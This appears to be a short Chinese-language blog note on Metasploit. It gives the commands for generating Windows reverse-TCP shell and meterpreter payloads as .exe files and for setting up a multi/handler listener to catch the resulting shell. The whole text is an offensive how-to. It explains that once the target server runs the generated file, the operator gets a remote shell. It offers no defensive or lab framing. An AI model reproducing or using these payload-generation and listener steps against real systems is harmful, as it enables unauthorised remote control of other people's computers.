msf shell筆記

metasploit幾種shellcode類型

  1. 可直接用nc接收的shell
    use payload/windows/x64/shell/reverse_tcp #win64 使用tcp反彈的shellcode
    set lhost ip
    set lport port
    generate -t exe -f d:\1.exe #生成shellcode文件

  2. 使用meterpreter接收的shell
    use payload/windows/meterpreter/reverse_tcp #win 彈meterpreter的shellcode
    set lhost ip
    set lport port
    generate -t exe -f d:\1.exe #生成shellcode文件

生成的文件不關類型,只要讓對方服務器執行,且對方服務器可以訪問到反彈的ip和端口,便會反彈到設置的ip和port上,只需要監聽對應端口即可獲得shell
meterpreter監聽命令

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp #該處payload可改成對應的payload,該項根據對方執行的shellcode類型
set lhost
set lport
exploit #執行後便會監聽設置的端口,如果有訪問則獲得shell

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章